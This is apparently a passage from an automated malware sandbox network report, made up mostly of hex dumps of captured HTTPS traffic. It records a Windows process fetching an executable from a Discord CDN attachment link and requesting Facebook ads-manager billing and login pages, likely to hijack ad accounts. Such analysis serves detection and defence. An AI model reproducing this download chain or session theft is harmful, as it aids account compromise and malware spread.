                                                                                                                                                                                    2023-01-05 07:59:32 UTC19612INData Raw: 75 2d 12 bf 4d 35 98 66 99 c1 03 18 cb 9f 49 f9 e6 53 f3 38 26 a4 86 8c f9 1c 3d 7c 97 cf bc 8e e3 f2 9e c9 a6 93 56 03 71 24 4f ba 70 6f c4 77 91 2d 5f 71 a4 1f aa 32 98 e6 30 23 44 40 aa a6 58 af 4b b9 43 a9 ff 32 51 b6 76 30 c9 57 1c 83 77 6e 5d b1 2f 31 d0 53 9f 38 8f 30 4b 65 cc d6 d9 f6 77 ca 99 09 9e ab 87 64 ee 8a 86 75 34 75 34 ef d9 cc 6a 6e 00 5c cd ef 23 76 f9 e0 a5 cf 32 76 00 a0 a5 7a 9d d9 5d d7 83 c4 f6 ac 21 69 f2 4a bf ed 59 27 0d 3c 4c 8f 77 e7 21 67 4b 8b 85 62 ef 01 0d f6 e6 88 2b 01 31 40 b4 11 90 05 c7 f2 b6 84 c7 33 cc e4 2a b8 72 3a 8a ac 80 6c 6c 71 5b d6 e4 f0 69 1f 09 80 08 ca f1 d8 75 03 9e e7 7d 5c df 64 3e 13 b6 6f f0 e5 c6 9d 9b 5b 4d 97 41 18 50 c4 18 ea fb 46 14 74 63 b1 70 a0 ea 60 93 2e 2b 22 86 14 fe 98 b1 0e 41 0f 5f
                                                                                                                                                                                    Data Ascii: u-M5fIS8&=|Vq$Opow-_q20#D@XKC2Qv0Wwn]/1S80Kewdu4u4jn\#v2vz]!iJY'<Lw!gKb+1@3*r:llq[iu}\d>o[MAPFtcp`.+"A_
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19628INData Raw: cd 54 fc c6 95 c1 fb e3 52 ea 0c 98 37 4b 0d 5a 46 6d 2c 27 87 66 19 3e 7a 0d 0c c9 c4 9e 16 fd d8 8a 6a 88 7e 5e 8e b1 33 b2 b4 30 78 4b a7 0c 76 13 d3 5a a4 05 69 77 68 89 25 85 c8 99 c5 e1 f0 07 e6 ab c5 f5 e8 39 ff 95 97 ac 3e 7e 49 bf 70 d8 4a e6 b5 93 8c 4c b5 1b 03 90 02 36 c3 0a 9c e0 5c 26 d7 21 35 3b 5a 7a 31 32 99 6f b0 49 e0 8c 71 6d ab ba 63 f3 77 22 d9 2e 94 f8 51 f7 2d ba 7b d5 25 94 5c 16 7e 37 ce 00 1e 51 a8 a5 49 02 38 76 69 a1 b6 8e e0 ab e5 dd ef 67 90 fe 0b 65 e8 61 f2 6e ff 3c 99 b9 1f 79 e5 7a 6e 71 17 ac f2 19 f5 25 21 e8 06 67 d9 67 51 49 88 b5 e0 d7 a0 8d 9c 85 e8 b2 17 44 b6 f9 9b 76 2d 28 c2 25 6c 06 6e 12 5b 2b 38 20 b8 35 63 8f bb 80 b4 02 85 bb b2 f7 b8 7b a4 a4 5a 91 49 cf c2 7c 59 ef e5 7e 3b 1b aa be 12 80 3f 2d ab af 14
                                                                                                                                                                                    Data Ascii: TR7KZFm,'f>zj~^30xKvZiwh%9>~IpJL6\&!5;Zz12oIqmcw".Q-{%\~7QI8vigean<yznq%!ggQIDv-(%ln[+8 5c{ZI|Y~;?-
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19644INData Raw: 8c b8 bc b7 ca 8b b1 a1 2a 49 77 68 e1 7f 79 57 50 b7 0e ce e0 b4 ef 2f 5c d7 78 e8 99 e4 fd 66 e5 67 c6 cc 29 bf 3a 56 0a b8 aa 6b 6d 59 a7 33 bb c9 54 36 50 c4 cd a9 9f b2 2e ed 3c ed ad ad 82 ca 01 3d 6b 76 fe eb 9c 9c e4 03 2d d9 20 0d 81 1b 5c 02 b6 4f 6e 03 20 19 81 fd 5b 90 77 02 a1 c9 44 b4 bb 90 9c 41 b0 21 f5 51 54 54 a2 15 9d 57 3f e0 43 35 06 f9 02 dd c1 23 13 7b 71 a6 26 6d 10 06 76 56 5e 29 a4 07 12 b9 44 56 df a6 5b cf ca cc 1d 54 73 ea c4 14 03 ac b6 e2 e1 96 67 2e 6f 8b 6f 87 d0 35 cc 5a 8f db b2 6f da 88 97 a6 aa 82 5f 6c ea df 30 d3 23 c2 0d 61 f9 dd af 2c 91 9f 22 28 3f 92 c1 49 ad 83 47 f6 70 ad 67 e0 8d 94 f6 09 d5 a4 84 58 0b c0 0c 97 26 df 92 a6 1c 0d e4 7e 56 b7 fe c2 56 c3 dd da 51 da cf 66 a6 ff 96 1f 3d a8 f3 b6 25 a9 07 77 7e
                                                                                                                                                                                    Data Ascii: *IwhyWP/\xfg):VkmY3T6P.<=kv- \On [wDA!QTTW?C5#{q&mvV^)DV[Tsg.oo5Zo_l0#a,"(?IGpgX&~VVQf=%w~
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19660INData Raw: 5f 3d 59 3d 88 8f f6 01 70 cb 19 64 38 16 eb 6b 65 82 ed 1b 25 8b 52 74 82 ce 0b 98 91 5a 79 1f de ea 6a d5 85 f5 86 a0 ed e7 c4 d6 ff 82 4a 3f 7f 52 db 2b f2 a6 20 83 24 83 e0 6f 80 3f 44 2a b1 8d 1f e5 c7 64 ba 65 87 9c 8b 1c b0 1c 32 d7 3c d5 cd 23 26 6e 2a 05 7d 26 fe c3 1a 61 5d 72 c8 20 28 8a 15 b7 a4 ba dd 54 ed 59 b4 b5 6c 85 13 1d a1 3b 53 bc e3 84 27 d2 fd b7 bd de 48 88 e8 dd 0d f0 41 b9 10 7f 30 6e 4a 81 6c d7 9a 2e 7d b4 51 fc e0 c1 46 43 8e 10 46 1e 76 29 a1 62 db f9 2e 3e d0 ab 03 74 02 47 7d 75 6a d9 a6 26 4c 96 cb 74 c8 9c cd 21 fb 25 c4 47 eb b3 70 70 94 1d 08 70 ac d7 74 9f 46 8a 5e 8c da cb 83 75 03 73 5d fb d4 06 3e 8f b3 09 e8 6a c3 8d ee 4e 5f 32 8e 95 80 82 74 a7 6b cf 87 20 9e 41 86 67 6b 51 b6 81 29 3b a8 9e 46 2b a8 cd bf 23 42
                                                                                                                                                                                    Data Ascii: _=Y=pd8ke%RtZyjJ?R+ $o?D*de2<#&n*}&a]r (TYl;S'HA0nJl.}QFCFv)b.>tG}uj&Lt!%GppptF^us]>jN_2tk AgkQ);F+#B
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19676INData Raw: d1 52 80 5d 00 ce 07 a3 b5 d6 ed 9d 8e c8 2f 09 90 6e c6 da c1 f6 9f a5 0d 7a 54 4f 15 6e 98 3a 2d f7 91 3e 39 1b 7b 5b df 93 b9 fb 0d a3 84 c9 dd 0a 85 68 ff f8 f9 d0 00 b5 7a 18 af 6c 7a 98 20 77 62 19 b0 9f 5d 0b 0d 73 17 b6 c0 19 41 be 88 74 3f 40 73 e8 bc 6c 69 97 78 bb 20 e8 c6 8f 0d 10 d3 fd ba 0c b5 bd ca 99 35 5b 88 e7 5c ca e9 96 f3 11 8b fa 20 cf 45 6f fa 10 2f 4d 8b 0e c9 05 17 03 21 e1 47 8b 66 e1 0f 5f 4b 32 5b 41 23 70 7b 9c a1 72 c2 1a 60 49 cd 29 a1 da 3b 9e 54 26 34 3f ed a8 ee d1 ae 2e da 22 bc f4 a5 05 e5 53 52 e1 35 66 b0 1c 05 00 fa 18 a6 f0 4b c5 76 ab 58 60 b8 0b 22 3e 31 2b 1e 6b 13 f8 a8 70 c4 6f ee c5 8f c6 fd c3 2f a1 f9 30 19 68 9e 61 8c f4 3f 12 08 e1 94 80 a0 a3 9f 56 13 3c 5a f6 8e 82 d6 ba 9e 3e b3 ff ed 7a 53 86 1c 69 3d
                                                                                                                                                                                    Data Ascii: R]/nzTOn:->9{[hzlz wb]sAt?@slix 5[\ Eo/M!Gf_K2[A#p{r`I);T&4?."SR5fKvX`">1+kpo/0ha?V<Z>zSi=
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19692INData Raw: d0 d0 41 0e 5e 97 3d 91 8c 51 00 c4 8e 2f e3 f5 48 dc 80 e8 19 30 09 51 5b 9c e9 55 66 86 fd 2f 97 3d aa f8 4d fb 5f 7f 96 d9 a6 3a 79 19 a4 0b de 28 1f 86 de dd df 47 c9 b2 df 51 bf 0e 47 af 67 7a cf 49 09 8d 36 74 b3 b3 78 1a 46 48 ce c7 2d e4 b9 e3 c0 3e b6 ee 3d d0 df 1d 1a 73 97 69 04 f9 c5 ee c5 3f b0 38 67 f2 33 ab 8f 54 23 3b 41 be a7 66 7e 9c c5 90 e2 45 b4 11 91 cd ea b7 45 7d 7d b0 cf 2f 2f 1c d7 1f 20 be 0e 31 38 49 7a 70 01 88 92 ae 9c 08 b9 68 10 f1 23 ad 8e 43 70 46 0d 7b c7 c0 25 e5 44 21 24 75 5c 87 ed 08 2f ed 6f 71 b4 29 21 91 33 fe 5c 07 d4 62 54 8b 50 23 d5 66 e3 83 47 e0 1c a4 49 17 c5 c7 e7 43 9c b6 76 08 fe 4e b5 df 37 97 69 37 fa 85 47 3e 90 ad 82 b8 c9 87 c9 72 c1 fa c6 41 d9 73 b8 a7 24 1d 41 bf 19 50 0f 08 f7 08 b3 e6 3f 72 ce
                                                                                                                                                                                    Data Ascii: A^=Q/H0Q[Uf/=M_:y(GQGgzI6txFH->=si?8g3T#;Af~EE}}// 18Izph#CpF{%D!$u\/oq)!3\bTP#fGICvN7i7G>rAs$AP?r
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19708INData Raw: 53 2a af a3 b3 b6 7e 5c 40 64 0e 6f b2 c6 aa 70 54 9c e4 3c 29 69 1c cd af 6c dd f4 90 bf 2f d2 75 87 0d d2 2a 6d d5 9b 5c 57 85 14 d9 25 9d 76 a6 31 51 51 ce 06 4e a6 6a ab 68 44 e6 04 4e a5 fa 1a c9 ff b2 b5 16 85 a9 b7 e0 ad 7a 90 60 4d 70 e0 11 7b 7d d7 b3 d3 a9 d1 3b af f4 6b c6 10 cf 24 1b ba 3e f8 23 5f c8 d5 03 9d 0b c9 dd 63 19 4d 6c e7 c6 6e f4 75 be 06 53 44 4b 55 6e f6 99 92 8d 14 f5 05 ea 3a 29 2a 63 7b 52 9f f5 fd 28 a1 d6 03 4d 3b a8 ac 97 fc 71 ea 99 62 b0 3d 7d b9 7a d1 45 83 70 94 32 c3 c7 2f 64 7f 2b 9e 1b 47 f4 63 e8 45 3c 56 50 96 1c 97 76 5a e8 27 dc 1a 5b c6 64 c2 53 e2 02 f2 1a 8a 89 5d 70 43 c8 a3 b2 33 19 b1 89 01 db 2c 9d d8 5f f7 33 e1 39 4e 75 74 55 58 67 a2 42 f5 e3 20 a0 c0 dc 9d 79 9c 8c 80 58 40 76 a5 a9 da f5 46 f4 58 98
                                                                                                                                                                                    Data Ascii: S*~\@dopT<)il/u*m\W%v1QQNjhDNz`Mp{};k$>#_cMlnuSDKUn:)*c{R(M;qb=}zEp2/d+GcE<VPvZ'[dS]pC3,_39NutUXgB yX@vFX
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19724INData Raw: 48 1c 02 be 5a fd 42 c2 c8 e8 8e 59 13 ef 7e b6 a5 ea 2d d6 df 5e f4 e5 80 81 d5 b2 be 1d 66 b1 31 51 9e 05 25 ff 11 f7 6d 67 0c 80 e5 47 25 a9 ba d2 5c 75 2a 83 33 c5 13 40 42 67 94 5c a4 87 6c 9b 3b 8a b6 ab c0 88 4b 34 01 92 48 88 cb 23 52 b3 24 05 7b 86 9e 37 e8 45 a2 19 88 39 43 4d 95 54 69 6e ff f2 8e ae e3 68 de be 44 77 a2 6f 18 5b a8 ca f4 9e 85 24 3a dc 0b 80 80 f5 70 5b b3 2d 6c 2b 7e 7a 18 73 54 eb 65 7f 44 f8 82 9f 6a 7b ea 7d ca b7 a1 2a 18 57 a9 e6 bd 1b 69 3a c0 1d 96 a0 4d df c5 8f 90 89 d4 f0 44 0d 93 a9 35 a9 88 54 64 81 8e 1e 7d b8 0b 44 d0 74 b8 9e 15 2d 4e 77 81 aa 2b 06 60 00 a2 40 35 e5 36 c0 ce fa eb f6 3f 3e db 6e fc dd c8 8e c9 c9 c8 83 fe 31 8c d6 e5 8e 29 5d 70 87 33 22 fe 1e d1 ec 77 55 0e b4 54 43 9d 0c 13 f5 1b 2b dd 9d d1
                                                                                                                                                                                    Data Ascii: HZBY~-^f1Q%mgG%\u*3@Bg\l;K4H#R${7E9CMTinhDwo[$:p[-l+~zsTeDj{}*Wi:MD5Td}Dt-Nw+`@56?>n1)]p3"wUTC+
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19740INData Raw: 8c fd aa f7 51 ef 77 f7 ee 3f 41 51 1f 88 e3 1b d5 58 3d 8d 79 b8 b7 2d 01 44 73 7c e1 52 00 2b 3d 3a 06 24 06 0d 5a 23 17 66 d1 96 9d 83 72 92 4b e7 1a db 4a 6b fb 89 d9 01 02 9c 53 f8 ca c4 6d 8b 6b 18 1b 0f f3 0b de 5a 4b 17 6a 3c 6b 3c bf 5b ce 9d d7 94 eb 49 e4 f7 b4 89 0c 06 22 47 05 82 98 16 33 64 2f 5f 6b a1 c2 46 25 5c 2e 7f b1 5c 8c 3a dd 8f 1c 0c 74 c7 52 cb 79 90 fc fb 7c 25 1f 4b 6f bd 68 50 db f4 de 28 ef ec d1 d3 50 b4 36 43 46 5b 25 3e b2 a8 9b c8 f3 37 8c 42 ab c3 99 26 09 7c 17 03 cf 7a f7 51 aa 40 c6 e8 24 f1 83 20 3f fb b7 37 96 7d 4b ab e4 70 5d 48 85 81 15 c0 e9 73 82 d1 cf db 49 7b d6 7f 78 f9 12 45 21 9a 2a 2b 00 c2 47 ba 2c 95 16 e5 25 63 1d 70 c5 e3 bc 36 b2 21 89 88 ef ff 7f fa 7d c1 85 c6 9c ca 1f 07 38 58 ce d5 19 22 e2 c3 bd
                                                                                                                                                                                    Data Ascii: Qw?AQX=y-Ds|R+=:$Z#frKJkSmkZKj<k<[I"G3d/_kF%\.\:tRy|%KohP(P6CF[%>7B&|zQ@$ ?7}Kp]HsI{xE!*+G,%cp6!}8X"
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19756INData Raw: cd 64 7b 9c c2 86 81 7a 08 68 38 a6 7d a4 00 b6 d3 ea 04 5e 6b 7f 5c a1 50 f6 17 c9 0f 64 8b d4 8f f9 16 ce f9 93 4d 14 3b 32 1f 42 18 4d 16 d9 9f 15 9b 6a 7d 21 5d 33 14 3a 0e 89 f3 21 f1 f2 ac 76 2c c8 0d 35 30 77 40 c1 2d 43 e6 28 b6 0b 69 b9 2d 0f d2 5e 28 98 6d 66 13 7d 1f a9 da 12 65 b4 2a 7a 34 67 bd 9a 71 0f b9 59 41 cf ad b8 aa 91 a5 1f e4 e8 e4 1d 2a fb 05 9f c7 36 e7 c7 45 e9 5d 9d 8c c4 24 2f aa e1 02 ff dd db 36 44 08 14 d5 73 8e 18 ac 78 fd e4 07 c8 d4 00 60 a5 ee 39 ce 11 49 24 11 25 03 7d a5 34 de 7b 8c 59 17 b6 e9 f6 07 38 8d da 80 85 92 2e 2d 94 64 78 50 0f 3f 17 8d 30 62 69 76 ea 0a 73 f1 d9 c7 a3 fe 33 df c9 81 50 0a 4c 64 cc ad 97 e3 90 aa 36 45 c7 36 97 8b ce 9c 8c be a9 e0 d1 a0 cc 5d 35 11 19 41 64 ff ce f2 e5 8e e5 12 7d 8b 7a e9
                                                                                                                                                                                    Data Ascii: d{zh8}^k\PdM;2BMj}!]3:!v,50w@-C(i-^(mf}e*z4gqYA*6E]$/6Dsx`9I$%}4{Y8.-dxP?0bivs3PLd6E6]5Ad}z
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19772INData Raw: 55 10 7c d2 00 0a 5e f3 2e 90 1b 5b 01 c0 61 d8 de 6f 69 c6 a8 89 de b9 75 59 7b 15 f2 c1 2f 64 b5 7f 81 d2 cc 99 0b 95 e7 07 8f bf a8 bd 23 24 94 74 42 0d 36 0f c1 be 7e e4 2c f3 11 df 7a d6 12 5e 85 e5 f3 ca b1 dc a9 d4 e0 f6 46 75 9d d5 d1 7d 4a 73 1f 09 93 7b 3f 09 e1 9f 77 9f 3b 88 ea 29 94 32 ad 07 01 80 72 a9 9c a5 d6 2e 36 f8 8a 5a d9 6d 20 cd 85 3b 07 13 de e3 53 21 bc de 96 8e fc b8 93 68 9c f6 4a cb fc e5 de 13 ca 6a 17 9f 87 d9 68 19 75 fa 85 aa a0 d3 4c 82 54 a6 30 5f 88 2f 84 ab 41 35 1a c5 42 56 b8 c1 71 46 cb 5f b1 e9 04 a7 72 98 03 8f c4 29 54 58 54 eb f0 b9 c0 4d fa 10 9a 89 83 df 27 4b 43 7c a3 27 4d 8f 47 1b ea 21 e4 d2 6b f1 64 45 b7 30 1e ab fa a8 1e 93 d7 bf 7d b9 98 90 e3 ed 8e e4 f8 a5 14 3f ea ba 40 f2 bb 11 2f ed 1a db c0 50 1b
                                                                                                                                                                                    Data Ascii: U|^.[aoiuY{/d#$tB6~,z^Fu}Js{?w;)2r.6Zm ;S!hJjhuLT0_/A5BVqF_r)TXTM'KC|'MG!kdE0}?@/P
                                                                                                                                                                                    2023-01-05 07:59:33 UTC19788INData Raw: 65 4a bc a6 e7 44 b4 81 de c0 c8 91 4b 49 99 89 69 18 67 5c 7d 28 94 2a 6d 28 6d 5a 80 04 14 59 19 af b8 90 d6 f4 30 4c 21 94 cc f2 21 23 09 5d 79 1c 13 52 5e 85 fb a5 8b 76 7e 30 5c bc 73 8b 64 73 58 bc 0d e8 b7 36 97 bf 97 9f 0e ad 54 3b 2c 82 79 04 0f 94 3f 9d 61 48 8f 1f 7e 8c a3 40 c5 a4 b5 4c c6 ff 3b 39 0e 74 7b eb 42 0d 8d ac 18 69 f2 50 e7 41 07 78 ec 1e 29 33 25 69 ab 81 b9 4c a4 0d 6e 4e 7b a4 64 e1 3c 7d 66 cb d1 9e d7 d8 25 01 87 12 da ec d2 4a e2 d7 a7 bc 60 40 45 01 24 eb d7 d0 92 4e c3 f8 bb e9 df 18 c3 3a c3 d6 16 87 ab c7 c0 6e 1b c1 9b f4 07 ec ee 0b 29 a9 48 a5 2b a2 9c d6 4a cd fd e9 38 a5 40 59 96 38 61 cc 29 00 a1 17 d8 1c d6 e9 94 b5 b7 a5 48 ee f0 e2 0b 27 75 32 77 e8 ee 14 fd a0 25 05 c4 bf db cc 6b e5 fb 8b 7b de 92 ca 47 51 77
                                                                                                                                                                                    Data Ascii: eJDKIig\}(*m(mZY0L!!#]yR^v~0\sdsX6T;,y?aH~@L;9t{BiPAx)3%iLnN{d<}f%J`@E$N:n)H+J8@Y8a)H'u2w%k{GQw


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    66192.168.2.450039162.159.130.233443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:43 UTC19802OUTGET /attachments/1059906296494686404/1060299047027613706/2.0.3-beta.exe HTTP/1.1
                                                                                                                                                                                    Host: cdn.discordapp.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: __cf_bm=ig4V6Bb52gMi05i2ty2QJMYY09WLeixE7KU4oSGFpMo-1672905581-0-ATpYTniRjaqpm5e9kq1sl0EntPiQOxpA1dSU9qlQv/9ZISlimeC5/eQ3izuUGJlIz92YWT6p0s0D/s8CFgyx90Y=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    67162.159.130.233443192.168.2.450039C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:43 UTC19803INHTTP/1.1 403 Forbidden
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:43 GMT
                                                                                                                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                                    Content-Length: 298
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 784aad1618772c63-FRA
                                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                                    Content-Disposition: attachment
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:59:43 GMT
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                    X-GUploader-UploadID: ADPycdtxz56kJCgClBaywbUM5x3tDiGOmsLDdkvOHNiA36bfW0seMEHPMuIN4ckJ4dKBxz9Jshqo9REcbVRO6FozU6PXzRMKxehu
                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5fBpSavW5rlcg8HM5fchvpYRNedoGWFS%2BPLVH51c0HYFmyMen9gCVoRVRnrCAv0D22bnXQWPN94jo9qXXEz6wbezH5OCYuLENfxKtKnMnSuP%2F72EI5bkUzGwzKmKaG3KMDVgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    2023-01-05 07:59:43 UTC19803INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 20 50 65 72 6d 69 73 73 69 6f 6e 20 27 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 27 20 64 65 6e 69 65 64 20 6f 6e 20 72 65 73 6f 75 72
                                                                                                                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object. Permission 'storage.objects.get' denied on resour


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    68192.168.2.450356157.240.247.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19804OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19805INHTTP/1.1 302 Found
                                                                                                                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19806INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    69192.168.2.450359157.240.247.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19808OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19809INHTTP/1.1 200 OK
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                                                                    x-fb-rlafr: 0
